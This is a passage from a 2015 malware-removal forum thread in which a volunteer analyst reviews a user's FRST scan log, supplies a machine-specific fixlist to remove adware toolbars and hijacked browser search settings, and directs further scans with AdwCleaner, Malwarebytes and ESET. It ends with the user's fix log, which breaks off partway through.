2015-08-20 13:09 - 2013-03-14 03:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-08-20 13:07 - 2013-08-16 03:01 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-08-20 12:57 - 2015-08-11 19:52 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Packages
2015-08-20 12:54 - 2011-02-04 06:02 - 132483416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-08-20 12:51 - 2011-04-13 10:48 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-08-20 12:37 - 2015-08-11 19:03 - 00000000 ____D C:\ProgramData\Package Cache
2015-08-18 19:41 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\restore

==================== Files in the root of some directories =======

2011-02-12 20:23 - 2011-02-12 20:23 - 0000697 _____ () C:\Users\Ken Terry\AppData\Roaming\ConvAPIPlugin.log
2014-10-25 05:15 - 2014-10-25 05:15 - 0000000 _____ () C:\Users\Ken Terry\AppData\Local\{70F50B53-050D-4745-ACDA-69E224C8841A}
2013-03-06 16:15 - 2013-03-06 16:15 - 0000057 _____ () C:\ProgramData\Ament.ini
2011-02-12 18:54 - 2013-11-12 16:31 - 0007100 _____ () C:\ProgramData\hpzinstall.log

Some files in TEMP:
====================
C:\Users\Ken Terry\AppData\Local\Temp\driver-updater-setup.exe
C:\Users\Ken Terry\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp0xxrew.dll
C:\Users\Ken Terry\AppData\Local\Temp\rscp_setup.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-08-11 18:59

==================== End of FRST.txt ============================
kfoxsr is offline  
Old 09-18-2015, 08:39 AM   #6
Security Team
Analyst
 
Larusso's Avatar
 
Join Date: Oct 2009
Location: Wels\ Austria
Posts: 729
OS: Win7 / Win 10 TechPreview



Please open Add/Remove Software and uninstall the software listed below.
Crawler Toolbar
GamesBar 2.0.1.81
Internet Explorer Toolbar 4.8 by SweetPacks
Pogo Games
TidyNetwork.com
Updater By SweetPacks 2.0.0.586


Reboot after the last one has been uninstalled.
A note for you: I see a bunch of Driver Update, Tweaking or Speedbooster Tools on your system. If you do not need them ( nobody does ) I recommend to uninstall them as well now. It is up to you but must of them are more harmfull for your system instead of helpfull.
  • Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste).
  • Save it as fixlist.txt next to FRST
  • If asked to change 'Encoding:' to 'Unicode:', please agree and save it.

    NOTE: Both FRST.exe and the fixlist.txt must be in the same location or the fix will not work.

    Code:
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [BackgroundContainer] => "C:\Windows\SysWOW64\Rundll32.exe" "C:\Users\Ken Terry\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll",DllRun <===== ATTENTION
    C:\Users\Ken Terry\AppData\Local\Conduit
    AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll => No File
    C:\PROGRA~2\SearchProtect\SearchProtect
    HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgTXLVDB5Nogic6kY3R6sQcMTkW9xX5fNFrygKHoWfBJFzmkaV3mH6p55lJc9PxupzbSdReFxRxFsJb88JMSCbUX6_v8ACjxhyoA-9gti9ZJC6bb7r0M49jBHXSpcJo_M,&q={searchTerms}
    HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgTXLVDB5Nogic6kY3R6sQcMTkW9xX5fNFrygKHoWfBJFzmkaV3mH6p55lJc9PxupzbSdReFxRxFsJb88JMSCbUX6_v8ACjxhyoA-9gti9ZJC6bb7r0M49jBHXSpcJo_M,&q={searchTerms}
    URLSearchHook: HKLM-x32 - (No Name) - {739df940-c5ee-4bab-9d7e-270894ae687a} - No File
    URLSearchHook: HKLM-x32 - (No Name) - {06aedb90-98b2-4989-ad0f-39d53551f6ad} - No File
    URLSearchHook: HKLM-x32 - Protected Toolbar - {c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} - C:\Program Files (x86)\Protected\prxtbProt.dll No File
    URLSearchHook: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 - (No Name) - {0696f815-a3a9-490a-bb14-9ec3350b1276} - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64SrcAs.dll No File
    C:\Program Files (x86)\Protected
    C:\Program Files (x86)\TelevisionFanatic
    SearchScopes: HKLM-x32 -> DefaultScope {9FAE6E2C-CDD1-4975-B4C9-5E196B025B78} URL =
    SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
    SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> {1AC5E05E-C560-46B2-83AB-4E5DBB92F2B2} URL =
    SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
    SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> {9693B710-7943-4C03-B346-5F8ABAFDFD28} URL = 
    BHO: AppGraffiti -> {6F6A5334-78E9-4D9B-8182-8B41EA8C39EF} -> C:\PROGRA~2\APPGRA~1\APPGRA~2.DLL No File
    C:\PROGRA~2\APPGRA~1
    BHO: Updater By SweetPacks -> {7D4F1959-3F72-49d5-8E59-F02F8AA6815D} -> C:\Program Files\Updater By SweetPacks\Extension64.dll No File
    C:\Program Files\Updater By SweetPacks
    BHO-x32: No Name -> {1CB20BF0-BBAE-40A7-93F4-6435FF3D0411} -> C:\PROGRA~2\Crawler\Toolbar\ctbr.dll No File
    BHO-x32: WebCake -> {2A5A2A90-3B30-4E6E-A955-2F232C6EF517} -> C:\Program Files (x86)\WebCake\WebCakeIEClient.dll No File
    BHO-x32: Unit -> {2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3} -> C:\Users\Ken Terry\AppData\Local\UnitLayers\temp.dat No File
    C:\PROGRA~2\Crawler
    C:\Program Files (x86)\WebCake
    BHO-x32: Search Assistant BHO -> {5d79f641-c168-40df-a32f-bacea7509e75} -> C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64SrcAs.dll No File
    BHO-x32: No Name -> {739df940-c5ee-4bab-9d7e-270894ae687a} -> No File
    BHO-x32: TidyNetwork.com -> {7736C7FA-512D-11E2-B871-DEC36088709B} -> C:\Users\Ken Terry\AppData\Local\TidyNetwork.com\tidy2ie.dll No File
    BHO-x32: Updater By SweetPacks -> {7D4F1959-3F72-49d5-8E59-F02F8AA6815D} -> C:\Program Files\Updater By SweetPacks\Extension32.dll No File
    C:\Users\Ken Terry\AppData\Local\TidyNetwork.com
    BHO-x32: Protected Toolbar -> {c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} -> C:\Program Files (x86)\Protected\prxtbProt.dll No File
    BHO-x32: GamesBarBHO Class -> {CB0D163C-E9F4-4236-9496-0597E24B23A5} -> C:\Program Files (x86)\GamesBar\2.0.1.81\oberontb.dll [2010-12-29] (Oberon Media Ltd.)
    BHO-x32: Toolbar BHO -> {cb41fc95-f1b3-4797-8bb6-1012ff62abba} -> C:\PROGRA~2\TELEVI~2\bar\1.bin\64bar.dll No File
    C:\Program Files (x86)\GamesBar
    Toolbar: HKLM-x32 - GamesBar - {6F282B65-56BF-4BD1-A8B2-A4449A05863D} - C:\Program Files (x86)\GamesBar\2.0.1.81\oberontb.dll [2010-12-29] (Oberon Media Ltd.)
    Toolbar: HKLM-x32 - &Crawler Toolbar - {4B3803EA-5230-4DC3-A7FC-33638F3D3542} - C:\PROGRA~2\Crawler\Toolbar\ctbr.dll No File
    Toolbar: HKLM-x32 - TelevisionFanatic - {c98d5b61-b0ea-4d48-9839-1079d352d880} - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64bar.dll No File
    Toolbar: HKLM-x32 - Protected Toolbar - {c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} - C:\Program Files (x86)\Protected\prxtbProt.dll No File
    Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {06AEDB90-98B2-4989-AD0F-39D53551F6AD} - No File
    Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {739DF940-C5EE-4BAB-9D7E-270894AE687A} - No File
    Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {EEE6C35B-6118-11DC-9C72-001320C79847} - No File
    Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {C5C4FD2C-C7AC-492C-A689-2E0843BA4E55} - No File
    Handler: tbr - {4D25FB7A-8902-4291-960E-9ADA051CFBBF} - C:\PROGRA~2\Crawler\Toolbar\ctbr.dll No File
    FF NewTab: hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgTXLVDB5Nogic6kY3R6sQcMTkW9xX5fNFrygKHoWfBJFzmkaV3mH6p55lJc9PxupzZ70aWXKwZIW9RA1LRSh2982syhqwv6-PG_JRvNPeCKrxE67JY3HQ97ynlRvPU4A,
    FF DefaultSearchUrl: hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3309762&CUI=UN66126008119710230&UM=2&SearchSource=3&q={searchTerms}
    FF Keyword.URL: hxxp://trovi.com/ResultsExt.aspx?ctid=CT3309762&SearchSource=2&CUI=UN66126008119710230&UM=2&q=
    FF HKLM\...\Firefox\Extensions: [{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}] - C:\Program Files\Updater By SweetPacks\Firefox
    FF Extension: No Name - C:\Program Files\Updater By SweetPacks\Firefox [2013-06-05]
    FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin
    FF Extension: No Name - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin [2011-10-19]
    FF HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\SingAlong\FF
    FF Extension: Sing Along - C:\Program Files (x86)\SingAlong\FF [2013-05-22]
    FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2015-08-31] <==== ATTENTION
    CHR HomePage: Default -> hxxp://www.search.ask.com/?gct=hp
    CHR StartupUrls: Default -> "hxxp://yahoo.com/","hxxps://www.google.com/"
    CHR DefaultSearchURL: Default -> hxxp://www.search.ask.com/web?q={searchTerms}
    CHR DefaultSearchKeyword: Default -> search.ask.com
    CHR DefaultSuggestURL: Default -> hxxp://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms}
    CHR Extension: (Ask Search) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl [2015-01-18]
    CHR HKLM-x32\...\Chrome\Extension: [fjoijdanhaiflhibkljeklcghcmmfffh] - C:\Program Files (x86)\WebCake\WebCakeLayers.crx <not found>
    CHR HKLM-x32\...\Chrome\Extension: [abepbblpkilpjohncjbccmdjhdhbnhdj] - C:\Program Files (x86)\SingAlong\Chrome.crx <not found>
    2015-09-12 13:08 - 2015-01-18 16:44 - 00000000 ____D C:\Program Files (x86)\EliteUnzip
    CHR Extension: (Elite Unzip) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\gafhhbahpojnjfhpepjjfjojbphnogmn [2015-01-18]
    Task: {1F311A34-0681-4CD1-9D84-BC11BA8A3C91} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
    Task: {41CDA214-FD3D-49F2-838B-D6E355FCD0C7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
    Task: {39CE9E03-E817-4DD0-A0E5-3D48949A016E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
    Task: {5A56BD5D-7692-4DC3-A70A-EBEDF8E70875} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
    Task: {46995030-ECAB-4DB8-B941-51CDCEA684EE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
    Task: {63E6FC54-C7B5-4E4D-8B46-192851267E4A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
    Task: {657F89F4-A0B0-4D32-9C0C-74B49E7AF41C} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTIO
    Task: {67C7EE72-2933-4355-BC62-62A7EC038E3F} - System32\Tasks\BackgroundContainer Startup Task => Rundll32.exe "C:\Users\Ken Terry\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll",DllRun <==== ATTENTION
    Task: {8CD95DE2-BD63-4247-9709-C85F879B4E47} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
    Task: {8FB2F090-2E3A-4FED-B924-7E5CB5A1A9F1} - System32\Tasks\TweakBit\Driver Updater\Start Driver Updater оn logon => C:\Program Files (x86)\TweakBit\Driver Updater\DriverUpdater.exe [2015-06-02] (TweakBit) <==== ATTENTION
    Task: {B2B193B4-584E-465F-A3A0-B9EEB0B8F7E7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
    Task: {AAF270E4-3BE6-42B0-8B71-A03C29CE37EF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
    Task: {BC4811CC-DF0C-4AB6-8CE8-B92779D9F7E9} - System32\Tasks\Scheduled Update for Ask Toolbar => C:\Program Files (x86)\Ask.com\UpdateTask.exe <==== ATTENTION
    Task: {C20C6816-47C2-4AB4-B52A-C61D3A10D348} - System32\Tasks\TweakBit\Speedtest Optimizer\Start Speedtest Optimizer оn logon => C:\Program Files (x86)\TweakBit\Speedtest Optimizer\SpeedtestOptimizer.exe [2015-08-26] (TweakBit) <==== ATTENTION
    Task: {F5B37634-028A-4669-9DA2-63DECF76903C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
    AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm
    EmptyTemp
  • Double-click FRST64 to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
  • Click the Fix button just once, and wait.
  • If you receive a message that a reboot is required, please make sure you allow it to restart normally.
  • The tool will complete its run after the restart.
  • When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system



Please download AdwCleaner from here and save it to your desktop.
  • Do NOT click the green 'Download' button(if visible).
  • Click the blue 'Download now @bleepingcomputer' button.
  • Run AdwCleaner and select Scan
  • Once the Scan is done, select Cleaning
  • Once done it will ask to reboot, please allow the reboot.
  • On reboot, a log will be produced. It can also be found at C:\AdwCleaner\AdwCleaner[S#].txt
  • Please copy/paste the contents of the log in your next reply.



Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Double-click mbam-setup-2.1.8.1057.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish
  • At the end of the installation, a database update will be performed.
  • Click on Scan Now
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Remove Selected to allow MBAM to clean what was detected.
  • In most cases, a restart will be required and a prompt will be shown.
  • Wait for the prompt to restart the computer to appear, then click on Yes
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double-click on the scan log which shows the Date and Time of the scan just performed.
  • Click Export
  • Click Text file (*.txt)
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named File Saved should appear stating "Your file has been successfully exported".
  • Click Ok
  • Please post that saved log in your next reply.



Go here and click 'Run ESET Online Scanner'.
  • If you are not using Internet Explorer, double-click esetsmartinstaller_enu.exe to install it, then click 'Run'.
  • Turn off the real-time scanner of any existing antivirus program while performing the online scan. Here's how
  • Tick the box next to YES, I accept the Terms of Use.
  • Click Start
  • If using Internet Explorer, allow the ActiveX control to install when asked.
  • Once the components have downloaded, tick the option Enable detection of potentially unwanted applications
  • Click on Advanced Settings
  • Make sure that the option Remove found threats is unticked.
  • Ensure these options are ticked:
    • Scan Archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Next to 'Current scan targets: Operating memory, Local drives', click the Change... button.
  • Tick all the boxes that correspond to your external/inserted drives.
  • Click Start
  • Wait for the scan to finish.
  • When the scan is done, if it shows a screen that says "Threats found!", click "List of found threats", and then click "Export to text file..."
  • Save that text file to your desktop, and then copy/paste the contents in your next reply.



Let me know how your system behaves now
__________________
regards, Daniel


There will never be peace in a war so I don't understand what they are fighting for

ASAP & UNITE Member
Larusso is offline  
Old 09-18-2015, 09:38 AM   #7
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



Fix log. I am continuing with the other steps

Fix result of Farbar Recovery Scan Tool (x64) Version:15-09-2015
Ran by Ken Terry (2015-09-18 11:36:47) Run:1
Running from C:\Users\Ken Terry\Downloads
Loaded Profiles: Ken Terry & DefaultAppPool (Available Profiles: Ken Terry & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [BackgroundContainer] => "C:\Windows\SysWOW64\Rundll32.exe" "C:\Users\Ken Terry\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll",DllRun <===== ATTENTION
C:\Users\Ken Terry\AppData\Local\Conduit
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll => No File
C:\PROGRA~2\SearchProtect\SearchProtect
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgTXLVDB5Nogic6kY3R6sQcMTkW9xX5fNFrygKHoWfBJFzmkaV3mH6p55lJc9PxupzbSdReFxRxFsJb88JMSCbUX6_v8ACjxhyoA-9gti9ZJC6bb7r0M49jBHXSpcJo_M,&q={searchTerms}
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgTXLVDB5Nogic6kY3R6sQcMTkW9xX5fNFrygKHoWfBJFzmkaV3mH6p55lJc9PxupzbSdReFxRxFsJb88JMSCbUX6_v8ACjxhyoA-9gti9ZJC6bb7r0M49jBHXSpcJo_M,&q={searchTerms}
URLSearchHook: HKLM-x32 - (No Name) - {739df940-c5ee-4bab-9d7e-270894ae687a} - No File
URLSearchHook: HKLM-x32 - (No Name) - {06aedb90-98b2-4989-ad0f-39d53551f6ad} - No File
URLSearchHook: HKLM-x32 - Protected Toolbar - {c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} - C:\Program Files (x86)\Protected\prxtbProt.dll No File
URLSearchHook: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 - (No Name) - {0696f815-a3a9-490a-bb14-9ec3350b1276} - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64SrcAs.dll No File
C:\Program Files (x86)\Protected
C:\Program Files (x86)\TelevisionFanatic
SearchScopes: HKLM-x32 -> DefaultScope {9FAE6E2C-CDD1-4975-B4C9-5E196B025B78} URL =
SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> {1AC5E05E-C560-46B2-83AB-4E5DBB92F2B2} URL =
SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> {9693B710-7943-4C03-B346-5F8ABAFDFD28} URL =
BHO: AppGraffiti -> {6F6A5334-78E9-4D9B-8182-8B41EA8C39EF} -> C:\PROGRA~2\APPGRA~1\APPGRA~2.DLL No File
C:\PROGRA~2\APPGRA~1
BHO: Updater By SweetPacks -> {7D4F1959-3F72-49d5-8E59-F02F8AA6815D} -> C:\Program Files\Updater By SweetPacks\Extension64.dll No File
C:\Program Files\Updater By SweetPacks
BHO-x32: No Name -> {1CB20BF0-BBAE-40A7-93F4-6435FF3D0411} -> C:\PROGRA~2\Crawler\Toolbar\ctbr.dll No File
BHO-x32: WebCake -> {2A5A2A90-3B30-4E6E-A955-2F232C6EF517} -> C:\Program Files (x86)\WebCake\WebCakeIEClient.dll No File
BHO-x32: Unit -> {2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3} -> C:\Users\Ken Terry\AppData\Local\UnitLayers\temp.dat No File
C:\PROGRA~2\Crawler
C:\Program Files (x86)\WebCake
BHO-x32: Search Assistant BHO -> {5d79f641-c168-40df-a32f-bacea7509e75} -> C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64SrcAs.dll No File
BHO-x32: No Name -> {739df940-c5ee-4bab-9d7e-270894ae687a} -> No File
BHO-x32: TidyNetwork.com -> {7736C7FA-512D-11E2-B871-DEC36088709B} -> C:\Users\Ken Terry\AppData\Local\TidyNetwork.com\tidy2ie.dll No File
BHO-x32: Updater By SweetPacks -> {7D4F1959-3F72-49d5-8E59-F02F8AA6815D} -> C:\Program Files\Updater By SweetPacks\Extension32.dll No File
C:\Users\Ken Terry\AppData\Local\TidyNetwork.com
BHO-x32: Protected Toolbar -> {c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} -> C:\Program Files (x86)\Protected\prxtbProt.dll No File
BHO-x32: GamesBarBHO Class -> {CB0D163C-E9F4-4236-9496-0597E24B23A5} -> C:\Program Files (x86)\GamesBar\2.0.1.81\oberontb.dll [2010-12-29] (Oberon Media Ltd.)
BHO-x32: Toolbar BHO -> {cb41fc95-f1b3-4797-8bb6-1012ff62abba} -> C:\PROGRA~2\TELEVI~2\bar\1.bin\64bar.dll No File
C:\Program Files (x86)\GamesBar
Toolbar: HKLM-x32 - GamesBar - {6F282B65-56BF-4BD1-A8B2-A4449A05863D} - C:\Program Files (x86)\GamesBar\2.0.1.81\oberontb.dll [2010-12-29] (Oberon Media Ltd.)
Toolbar: HKLM-x32 - &Crawler Toolbar - {4B3803EA-5230-4DC3-A7FC-33638F3D3542} - C:\PROGRA~2\Crawler\Toolbar\ctbr.dll No File
Toolbar: HKLM-x32 - TelevisionFanatic - {c98d5b61-b0ea-4d48-9839-1079d352d880} - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64bar.dll No File
Toolbar: HKLM-x32 - Protected Toolbar - {c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} - C:\Program Files (x86)\Protected\prxtbProt.dll No File
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {06AEDB90-98B2-4989-AD0F-39D53551F6AD} - No File
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {739DF940-C5EE-4BAB-9D7E-270894AE687A} - No File
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {EEE6C35B-6118-11DC-9C72-001320C79847} - No File
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {C5C4FD2C-C7AC-492C-A689-2E0843BA4E55} - No File
Handler: tbr - {4D25FB7A-8902-4291-960E-9ADA051CFBBF} - C:\PROGRA~2\Crawler\Toolbar\ctbr.dll No File
FF NewTab: hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgTXLVDB5Nogic6kY3R6sQcMTkW9xX5fNFrygKHoWfBJFzmkaV3mH6p55lJc9PxupzZ70aWXKwZIW9RA1LRSh2982syhqwv6-PG_JRvNPeCKrxE67JY3HQ97ynlRvPU4A,
FF DefaultSearchUrl: hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3309762&CUI=UN66126008119710230&UM=2&SearchSource=3&q={searchTerms}
FF Keyword.URL: hxxp://trovi.com/ResultsExt.aspx?ctid=CT3309762&SearchSource=2&CUI=UN66126008119710230&UM=2&q=
FF HKLM\...\Firefox\Extensions: [{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}] - C:\Program Files\Updater By SweetPacks\Firefox
FF Extension: No Name - C:\Program Files\Updater By SweetPacks\Firefox [2013-06-05]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin
FF Extension: No Name - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin [2011-10-19]
FF HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\SingAlong\FF
FF Extension: Sing Along - C:\Program Files (x86)\SingAlong\FF [2013-05-22]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2015-08-31] <==== ATTENTION
CHR HomePage: Default -> hxxp://www.search.ask.com/?gct=hp
CHR StartupUrls: Default -> "hxxp://yahoo.com/","hxxps://www.google.com/"
CHR DefaultSearchURL: Default -> hxxp://www.search.ask.com/web?q={searchTerms}
CHR DefaultSearchKeyword: Default -> search.ask.com
CHR DefaultSuggestURL: Default -> hxxp://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms}
CHR Extension: (Ask Search) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl [2015-01-18]
CHR HKLM-x32\...\Chrome\Extension: [fjoijdanhaiflhibkljeklcghcmmfffh] - C:\Program Files (x86)\WebCake\WebCakeLayers.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [abepbblpkilpjohncjbccmdjhdhbnhdj] - C:\Program Files (x86)\SingAlong\Chrome.crx <not found>
2015-09-12 13:08 - 2015-01-18 16:44 - 00000000 ____D C:\Program Files (x86)\EliteUnzip
CHR Extension: (Elite Unzip) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\gafhhbahpojnjfhpepjjfjojbphnogmn [2015-01-18]
Task: {1F311A34-0681-4CD1-9D84-BC11BA8A3C91} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {41CDA214-FD3D-49F2-838B-D6E355FCD0C7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {39CE9E03-E817-4DD0-A0E5-3D48949A016E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {5A56BD5D-7692-4DC3-A70A-EBEDF8E70875} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {46995030-ECAB-4DB8-B941-51CDCEA684EE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {63E6FC54-C7B5-4E4D-8B46-192851267E4A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {657F89F4-A0B0-4D32-9C0C-74B49E7AF41C} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTIO
Task: {67C7EE72-2933-4355-BC62-62A7EC038E3F} - System32\Tasks\BackgroundContainer Startup Task => Rundll32.exe "C:\Users\Ken Terry\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll",DllRun <==== ATTENTION
Task: {8CD95DE2-BD63-4247-9709-C85F879B4E47} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
